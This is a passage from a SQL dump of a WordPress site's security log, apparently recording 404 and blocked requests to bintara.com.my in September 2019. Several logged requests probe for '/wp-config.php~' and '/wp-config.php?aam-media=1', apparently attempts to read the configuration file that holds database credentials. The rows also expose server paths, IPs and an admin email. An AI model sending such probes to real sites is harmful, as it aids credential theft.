11:28:53',30758072,32572944,'https://bintara.com.my/3',1,0,'198.27.69.176'),(26984,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php~\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:36:\"http://bintara.com.my/wp-config.php~\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYtSZGE34CWnhBYozkDR2QAAAMs\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtSZGE34CWnhBYozkDR2QAAAMs\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.69.176\";s:11:\"REMOTE_PORT\";s:5:\"39500\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php~\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtSZGE34CWnhBYozkDR2QAAAMs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569411684.3647\";s:12:\"REQUEST_TIME\";s:10:\"1569411684\";}}','notice','2019-09-25 11:41:25','2019-09-25 11:41:24',30765936,32571288,'https://bintara.com.my/wp-config.php~',1,0,'198.27.69.176'),(26985,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-config.php?aam-media=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:47:\"http://bintara.com.my/wp-config.php?aam-media=1\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYtSaWE34CWnhBYozkDR2gAAANc\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtSaWE34CWnhBYozkDR2gAAANc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.69.176\";s:11:\"REMOTE_PORT\";s:5:\"43614\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp-config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtSaWE34CWnhBYozkDR2gAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569411689.1288\";s:12:\"REQUEST_TIME\";s:10:\"1569411689\";}}','notice','2019-09-25 11:41:30','2019-09-25 11:41:29',30764336,32583200,'https://bintara.com.my/wp-config.php?aam-media=1',1,0,'198.27.69.176'),(26986,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtSkmE34CWnhBYozkDR4QAAAM0\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.69.176\";s:11:\"REMOTE_PORT\";s:5:\"50578\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtSkmE34CWnhBYozkDR4QAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569411730.4789\";s:12:\"REQUEST_TIME\";s:10:\"1569411730\";}}','notice','2019-09-25 11:42:12','2019-09-25 11:42:10',30745632,32555296,'https://bintara.com.my/2',1,0,'198.27.69.176'),(26987,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtSl2E34CWnhBYozkDR4gAAANg\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.69.176\";s:11:\"REMOTE_PORT\";s:5:\"54994\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtSl2E34CWnhBYozkDR4gAAANg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569411735.8017\";s:12:\"REQUEST_TIME\";s:10:\"1569411735\";}}','notice','2019-09-25 11:42:17','2019-09-25 11:42:16',30755640,32566096,'https://bintara.com.my/3',1,0,'198.27.69.176'),(26988,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"50666\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtSynlb-cYDmeWuuuf8QwAAAE4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569411786.8918\";s:12:\"REQUEST_TIME\";s:10:\"1569411786\";}}','notice','2019-09-25 11:43:08','2019-09-25 11:43:07',30809392,32628320,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(26989,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php~\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYtTZt1OETjqfsv3Bw5uZAAAAI0\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtTZt1OETjqfsv3Bw5uZAAAAI0\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.69.176\";s:11:\"REMOTE_PORT\";s:5:\"53796\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php~\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtTZt1OETjqfsv3Bw5uZAAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569411942.8099\";s:12:\"REQUEST_TIME\";s:10:\"1569411942\";}}','notice','2019-09-25 11:45:44','2019-09-25 11:45:43',30762928,32580704,'https://bintara.com.my/wp-config.php~',1,0,'198.27.69.176'),(26990,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-config.php?aam-media=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYtTafTT-ZZc8Zptu2C0NQAAARI\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp-config.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtTafTT-ZZc8Zptu2C0NQAAARI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.69.176\";s:11:\"REMOTE_PORT\";s:5:\"56950\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp-config.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp-config.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtTafTT-ZZc8Zptu2C0NQAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569411945.9384\";s:12:\"REQUEST_TIME\";s:10:\"1569411945\";}}','notice','2019-09-25 11:45:47','2019-09-25 11:45:46',30764448,32580320,'https://bintara.com.my/wp-config.php?aam-media=1',1,0,'198.27.69.176'),(26991,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"53909\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtZuN1OETjqfsv3Bw5yPAAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569413560.9108\";s:12:\"REQUEST_TIME\";s:10:\"1569413560\";}}','notice','2019-09-25 12:12:42','2019-09-25 12:12:41',30818440,32641152,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(26992,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtezN1OETjqfsv3Bw51wQAAAIU\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"50689\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtezN1OETjqfsv3Bw51wQAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569414860.1458\";s:12:\"REQUEST_TIME\";s:10:\"1569414860\";}}','notice','2019-09-25 